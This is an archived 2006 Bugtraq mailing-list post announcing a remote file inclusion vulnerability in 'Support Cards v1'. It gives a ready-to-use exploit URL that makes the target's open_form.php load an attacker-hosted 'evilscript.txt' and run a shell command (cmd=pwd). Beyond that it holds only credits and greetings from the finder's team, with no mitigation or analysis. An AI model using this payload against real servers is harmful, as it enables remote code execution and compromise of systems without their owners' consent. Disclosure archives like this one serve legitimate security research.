file include exploit in Support Cards v1

---

• From: "black code" <black-cod3@xxxxxxxxxxx>
• Date: Tue, 30 May 2006 23:26:57 +0300

---

file include exploit in Support Cards v1

forum type : Support cards v1
bug found by : sweet-devil
team : site-down
type : file include

####################################################
exploit :


http://www.example.com/support/include/open_form.php?include_dir=http://ursite/evilscript.txt?cmd=pwd

####################################################


#######################
emails:

black-cod3@xxxxxxxxxxx & gamr-14@xxxxxxxxxxx
#######################


All my respect to our friends , lezr.com , g123g.net


done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

---

• Prev by Date: toendaCMS 0.7.0 Cross Site Scripting
• Next by Date: Secunia Research: Eserv/3 IMAP and HTTP Server Multiple Vulnerabilities
• Previous by thread: toendaCMS 0.7.0 Cross Site Scripting
• Next by thread: Secunia Research: Eserv/3 IMAP and HTTP Server Multiple Vulnerabilities
• Index(es):
  • Date
  • Thread

---

Relevant Pages Critical sql injection in saphplesson 2.0 ... Critical sql injection in: ... forum type: saphplesson 2.0 ... path to admin login: ... (Bugtraq) Re: file include exploits in randshop v1.2 ... forum type: randshop v1.2 ... bug found by: black-code ... team: site-down ... (Bugtraq)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2006-05